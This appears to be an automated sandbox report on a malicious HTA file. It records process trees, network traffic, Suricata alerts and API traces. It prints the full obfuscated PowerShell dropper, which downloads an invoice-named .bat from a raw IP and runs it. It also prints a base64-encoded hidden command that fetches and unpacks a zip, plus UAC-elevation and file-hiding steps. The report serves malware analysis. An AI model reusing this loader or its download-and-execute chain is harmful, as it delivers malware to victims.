Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Dec. 7, 2022, 9:40 a.m.	Dec. 7, 2022, 9:42 a.m.

Size	134.5KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`f959e6882af46c0c9b31d88d596444df`
SHA256	`752a84ba60cc53ec23642402ff87c1eee074ca6ae7703bec7b1ef9e600f63e9a`
CRC32	`43CB0F4C`
ssdeep	`1536:5eg8M3o0bT0HFUsmYQY1OaN2SDgzAbhnMGpJUTpGJtgDezN+wEN1:5es40bwHFwzYUaTDgzk63TpagsNNEN1`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\lib32.hta
3008
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function neH($EVB, $XkX){[IO.File]::WriteAllBytes($EVB, $XkX)};function RwI($EVB){if($EVB.EndsWith((qQr @(5830,5884,5892,5892))) -eq $True){rundll32.exe $EVB }elseif($EVB.EndsWith((qQr @(5830,5896,5899,5833))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EVB}elseif($EVB.EndsWith((qQr @(5830,5893,5899,5889))) -eq $True){misexec /qn /i $EVB}else{Start-Process $EVB}};function FYF($neH){$oKw=(qQr @(5856,5889,5884,5884,5885,5894));$fMO=(Get-ChildItem $neH -Force);$fMO.Attributes=$fMO.Attributes -bor ([IO.FileAttributes]$oKw).value__};function kME($eoN){$kYq = New-Object (qQr @(5862,5885,5900,5830,5871,5885,5882,5851,5892,5889,5885,5894,5900));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$XkX = $kYq.DownloadData($eoN);return $XkX};function qQr($Yfu){$LIz=5784;$WDo=$Null;foreach($NrK in $Yfu){$WDo+=[char]($NrK-$LIz)};return $WDo};function QCr(){$DqQ = $env:ProgramData + '\';$RgpGMb = $DqQ + 'image.png';If(Test-Path -Path $RgpGMb){Invoke-Item $RgpGMb;}Else{ $VVOBCF = kME (qQr @(5888,5900,5900,5896,5899,5842,5831,5831,5889,5830,5889,5882,5882,5830,5883,5895,5831,5836,5900,5902,5840,5836,5898,5859,5831,5889,5893,5881,5887,5885,5830,5896,5894,5887));neH $RgpGMb $VVOBCF;Invoke-Item $RgpGMb;};;;$IfJAdDAhOV = $DqQ + 'Fattura_IT9032003.bat'; if (Test-Path -Path $IfJAdDAhOV){RwI $IfJAdDAhOV;}Else{ $dIxLH = kME (qQr @(5888,5900,5900,5896,5842,5831,5831,5833,5833,5838,5830,5834,5832,5835,5830,5833,5841,5830,5841,5839,5831,5833,5831,5854,5881,5900,5900,5901,5898,5881,5879,5857,5868,5841,5832,5835,5834,5832,5832,5835,5830,5882,5881,5900));neH $IfJAdDAhOV $dIxLH;RwI $IfJAdDAhOV;};FYF $IfJAdDAhOV;;;}QCr;
  2212
  - cmd.exe cmd /c ""C:\ProgramData\Fattura_IT9032003.bat" "
    2368
    - powershell.exe powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\ProgramData\Fattura_IT9032003.bat"' -ArgumentList 'am_admin'"
      2504
      - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\Fattura_IT9032003.bat" am_admin
        664
        
        powershell.exe powershell.exe -nologo -noprofile -WindowStyle hidden -exec bypass -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBOAEUAVAAtAEYAcgBhAG0AZQBXAG8AcgBrAC0AeAA2ADQALwBOAEUAVAAvAHIAYQB3AC8AbQBhAGkAbgAvAE4ARQBUAEYAcgBhAG0AZQB3AG8AcgBrAC4AegBpAHAAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE4ARQBUAEYAcgBhAG0AZQB3AG8AcgBrAC4AegBpAHAAJwApADsAIABFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABOAEUAVABGAHIAYQBtAGUAdwBvAHIAawAuAHoAaQBwACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAJwA=
        1844
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F"
        2116
        
        xcopy.exe xcopy "C:\Program Files\NETFramework\start.exe" Fattura_IT9032003.bat.exe /y
        2636
        
        attrib.exe attrib +s +h Fattura_IT9032003.bat.exe
        2492
        
        attrib.exe attrib -s -h Fattura_IT9032003.bat.exe
        2824

Name	Response	Post-Analysis Lookup
i.ibb.co	A 172.96.160.210 A 172.96.160.222 A 104.194.8.120 A 172.96.161.50 A 172.96.160.127	172.96.160.210
github.com	A 20.200.245.247	20.200.245.247

IP Address	Status	Action
116.203.19.97	Active	Moloch
164.124.101.2	Active	Moloch
172.96.160.222	Active	Moloch
20.200.245.247	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49164 -> 172.96.160.222:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49175 -> 20.200.245.247:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49174 -> 20.200.245.247:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49163 -> 172.96.160.222:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 116.203.19.97:80 -> 192.168.56.102:49165	2026988	ET INFO PowerShell NoProfile Command Received In Powershell Stagers	A Network Trojan was detected
TCP 116.203.19.97:80 -> 192.168.56.102:49165	2026989	ET INFO PowerShell Hidden Window Command Common In Powershell Stagers M1	A Network Trojan was detected
TCP 116.203.19.97:80 -> 192.168.56.102:49165	2026992	ET INFO PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1	A Network Trojan was detected
TCP 116.203.19.97:80 -> 192.168.56.102:49165	2026993	ET INFO PowerShell Base64 Encoded Content Command Common In Powershell Stagers M2	A Network Trojan was detected
TCP 116.203.19.97:80 -> 192.168.56.102:49165	2036760	ET INFO Powershell Base64 Decode Command Inbound	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (20 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 7, 2022, 9:40 a.m.			0	0
IsDebuggerPresent Dec. 7, 2022, 9:40 a.m.			0	0
IsDebuggerPresent Dec. 7, 2022, 9:40 a.m.			0	0

Command line console output was observed (50 out of 154 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: At line:1 char:692 console_handle: 0x00000053	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: + function neH($EVB, $XkX){[IO.File]::WriteAllBytes($EVB, $XkX)};function RwI($ console_handle: 0x0000005f	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: EVB){if($EVB.EndsWith((qQr @(5830,5884,5892,5892))) -eq $True){rundll32.exe $EV console_handle: 0x0000006b	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: B }elseif($EVB.EndsWith((qQr @(5830,5896,5899,5833))) -eq $True){powershell.exe console_handle: 0x00000077	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: -ExecutionPolicy unrestricted -File $EVB}elseif($EVB.EndsWith((qQr @(5830,5893 console_handle: 0x00000083	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: ,5899,5889))) -eq $True){misexec /qn /i $EVB}else{Start-Process $EVB}};function console_handle: 0x0000008f	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: FYF($neH){$oKw=(qQr @(5856,5889,5884,5884,5885,5894));$fMO=(Get-ChildItem $neH console_handle: 0x0000009b	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: -Force);$fMO.Attributes=$fMO.Attributes -bor ([IO.FileAttributes]$oKw).value__ console_handle: 0x000000a7	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: };function kME($eoN){$kYq = New-Object (qQr @(5862,5885,5900,5830,5871,5885,588 console_handle: 0x000000b3	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: 2,5851,5892,5889,5885,5894,5900));[Net.ServicePointManager]:: <<<< SecurityProt console_handle: 0x000000bf	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: ocol = [Net.SecurityProtocolType]::TLS12;$XkX = $kYq.DownloadData($eoN);return console_handle: 0x000000cb	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: $XkX};function qQr($Yfu){$LIz=5784;$WDo=$Null;foreach($NrK in $Yfu){$WDo+=[char console_handle: 0x000000d7	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: ]($NrK-$LIz)};return $WDo};function QCr(){$DqQ = $env:ProgramData + '\';$RgpGMb console_handle: 0x000000e3	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: = $DqQ + 'image.png';If(Test-Path -Path $RgpGMb){Invoke-Item $RgpGMb;}Else{ $V console_handle: 0x000000ef	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: VOBCF = kME (qQr @(5888,5900,5900,5896,5899,5842,5831,5831,5889,5830,5889,5882, console_handle: 0x000000fb	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: ,5887,5885,5830,5896,5894,5887));neH $RgpGMb $VVOBCF;Invoke-Item $RgpGMb;};;;$I console_handle: 0x00000113	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: fJAdDAhOV = $DqQ + 'Fattura_IT9032003.bat'; if (Test-Path -Path $IfJAdDAhOV){Rw console_handle: 0x0000011f	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: I $IfJAdDAhOV;}Else{ $dIxLH = kME (qQr @(5888,5900,5900,5896,5842,5831,5831,583 console_handle: 0x0000012b	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: 835,5830,5882,5881,5900));neH $IfJAdDAhOV $dIxLH;RwI $IfJAdDAhOV;};FYF $IfJAdDA console_handle: 0x0000014f	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: hOV;;;}QCr; console_handle: 0x0000015b	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x00000167	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x00000173	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti console_handle: 0x00000193	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000019f	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: At line:1 char:769 console_handle: 0x000001ab	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: + function neH($EVB, $XkX){[IO.File]::WriteAllBytes($EVB, $XkX)};function RwI($ console_handle: 0x000001b7	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: EVB){if($EVB.EndsWith((qQr @(5830,5884,5892,5892))) -eq $True){rundll32.exe $EV console_handle: 0x000001c3	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: B }elseif($EVB.EndsWith((qQr @(5830,5896,5899,5833))) -eq $True){powershell.exe console_handle: 0x000001cf	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: -ExecutionPolicy unrestricted -File $EVB}elseif($EVB.EndsWith((qQr @(5830,5893 console_handle: 0x000001db	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: ,5899,5889))) -eq $True){misexec /qn /i $EVB}else{Start-Process $EVB}};function console_handle: 0x000001e7	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: FYF($neH){$oKw=(qQr @(5856,5889,5884,5884,5885,5894));$fMO=(Get-ChildItem $neH console_handle: 0x000001f3	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: -Force);$fMO.Attributes=$fMO.Attributes -bor ([IO.FileAttributes]$oKw).value__ console_handle: 0x000001ff	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: };function kME($eoN){$kYq = New-Object (qQr @(5862,5885,5900,5830,5871,5885,588 console_handle: 0x0000020b	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: 2,5851,5892,5889,5885,5894,5900));[Net.ServicePointManager]::SecurityProtocol = console_handle: 0x00000217	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: [Net.SecurityProtocolType]::TLS12;$XkX = $kYq.DownloadData <<<< ($eoN);return console_handle: 0x00000223	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: $XkX};function qQr($Yfu){$LIz=5784;$WDo=$Null;foreach($NrK in $Yfu){$WDo+=[char console_handle: 0x0000022f	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: ]($NrK-$LIz)};return $WDo};function QCr(){$DqQ = $env:ProgramData + '\';$RgpGMb console_handle: 0x0000023b	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: = $DqQ + 'image.png';If(Test-Path -Path $RgpGMb){Invoke-Item $RgpGMb;}Else{ $V console_handle: 0x00000247	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: VOBCF = kME (qQr @(5888,5900,5900,5896,5899,5842,5831,5831,5889,5830,5889,5882, console_handle: 0x00000253	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: ,5887,5885,5830,5896,5894,5887));neH $RgpGMb $VVOBCF;Invoke-Item $RgpGMb;};;;$I console_handle: 0x0000026b	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: fJAdDAhOV = $DqQ + 'Fattura_IT9032003.bat'; if (Test-Path -Path $IfJAdDAhOV){Rw console_handle: 0x00000277	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: I $IfJAdDAhOV;}Else{ $dIxLH = kME (qQr @(5888,5900,5900,5896,5842,5831,5831,583 console_handle: 0x00000283	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: 835,5830,5882,5881,5900));neH $IfJAdDAhOV $dIxLH;RwI $IfJAdDAhOV;};FYF $IfJAdDA console_handle: 0x000002a7	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: hOV;;;}QCr; console_handle: 0x000002b3	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000002bf	1	1
WriteConsoleW Dec. 7, 2022, 9:40 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000002cb	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 134 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582ed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005829d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00582cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005823d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005823d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005823d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005823d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005823d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005823d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005823d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005823d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b1268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b18e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b18e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b18e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 7, 2022, 9:40 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://116.203.19.97/1/Fattura_IT9032003.bat

Performs some HTTP requests (1 event)

request

GET http://116.203.19.97/1/Fattura_IT9032003.bat

Allocates read-write-execute memory (usually to unpack itself) (50 out of 457 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 3008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73162000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 3008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c73000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02780000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71481000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
